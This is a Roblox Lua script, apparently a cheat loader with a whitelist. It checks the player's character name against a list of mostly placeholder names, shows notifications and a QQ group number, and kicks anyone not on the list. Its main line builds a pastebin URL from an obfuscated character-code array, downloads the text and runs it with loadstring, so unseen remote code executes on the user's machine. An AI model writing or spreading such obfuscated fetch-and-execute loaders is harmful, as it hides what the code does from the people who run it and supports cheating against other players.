local CoreGui = game:GetService("StarterGui")
CoreGui:SetCore("SendNotification", {
    Title = "老脚本",
    Text = "正在验证....",
    Duration = 5,
})
local a=tostring(game.Players.LocalPlayer.Character);
if a=="123fa98"then
_G.bmd=true
elseif a=="hdkdksqow"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="hdkdksqow"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
elseif a=="用户名"then
_G.bmd=true
end
if _G.bmd==true then
local CoreGui = game:GetService("StarterGui")
CoreGui:SetCore("SendNotification", {
    Title = "老脚本",
    Text = a.."欢迎您",
    Duration = 5,
})
     qun = "群号:915683610"
loadstring(game:HttpGet(utf8.char((function() return table.unpack({104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,52,81,74,109,75,50,99,72})end)())))();
     else
  setclipboard("群号")
  game.Players.LocalPlayer:Kick("阿巴阿巴")
end
